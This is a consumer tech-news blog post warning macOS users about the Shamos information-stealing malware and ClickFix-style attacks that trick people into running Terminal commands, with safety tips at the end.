It’s not just PC users who need to be careful on the internet. A dangerous new malware called Shamos is targeting macOS users, and it’s part of a growing trend of cyberattacks that trick people into infecting their own devices. Disguised as helpful guides or troubleshooting tools, Shamos is designed to steal sensitive information from unsuspecting users.

What Is Shamos?
Shamos is a variant of AMOS (Atomic macOS Stealer), developed by the COOKIE SPIDER cybercriminal group. It poses as legitimate software—such as manuals, guides, or fixes for macOS issues—and lures users into downloading it. Once installed, it steals:

  • Browser credentials
  • Apple Keychain items
  • Apple Notes
  • Cryptocurrency wallet data

How It Spreads
Cybersecurity firm CrowdStrike first detected Shamos and reports that over 300 environments have been targeted since June. The malware spreads through:

  • Malvertising (malicious ads)
  • Fake GitHub repositories
  • ClickFix-style attacks — where users are tricked into running shell commands in Terminal to “fix” an issue

These attacks often use spoofed websites like mac-safer[.]com or rescue-mac[.]com, which appear to offer help for common macOS problems. Instead of solving anything, the commands users are told to run decode a malicious script that:

  1. Captures the user’s password
  2. Downloads the Shamos executable
  3. Executes the malware

What Happens After Infection
Once active, Shamos collects data from the infected Mac, including:

  • Cryptocurrency wallet files
  • Keychain and Notes data
  • Browser-stored information

It then packages this data into a file called out.zip and sends it to the attackers using curl.

Shamos can also:

  • Ensure persistence by running at startup (if installed with sudo privileges)
  • Download additional payloads, such as fake apps (e.g., a spoofed Ledger Live wallet) or botnet modules

Why ClickFix Attacks Are So Dangerous
ClickFix-style attacks are increasingly common and effective. They’ve been seen in:

  • TikTok videos
  • Fake CAPTCHAs
  • Bogus Google Meet error fixes

These attacks are popular because they work—users unknowingly infect their own systems by following seemingly helpful instructions.

How to Stay Safe
If you’re a macOS user, here are some essential safety tips:

  • Never run Terminal commands you find online unless you fully understand what they do and trust the source.
  • Be cautious with GitHub repositories—malicious projects can be disguised as helpful tools.
  • Avoid sponsored search results when troubleshooting macOS issues. Instead, use:
    • The Apple Community forums (moderated by Apple)
    • The built-in Help menu on your Mac
  • Use trusted antivirus software for macOS. Paid options often include:
    • VPNs
    • Password managers
    • Secure browsers for financial transactions

Final Thoughts
ClickFix attacks are here to stay, and they’re being used in everything from ransomware to state-sponsored cyberattacks. Until Apple and other tech companies develop better defenses, your best protection is caution. Always verify the source before downloading or running anything on your Mac.

Thanks to Tom’s Guide for this important update
https://www.tomsguide.com/computing/online-security/macs-under-attack-from-dangerous-new-info-stealing-malware-how-to-stay-safe

Deliver David's Tech Talk to my inbox

We'll send David's weekly Tech Talk to your inbox - including the MP3 of the actual radio spot. You'll never miss a valuable tip again!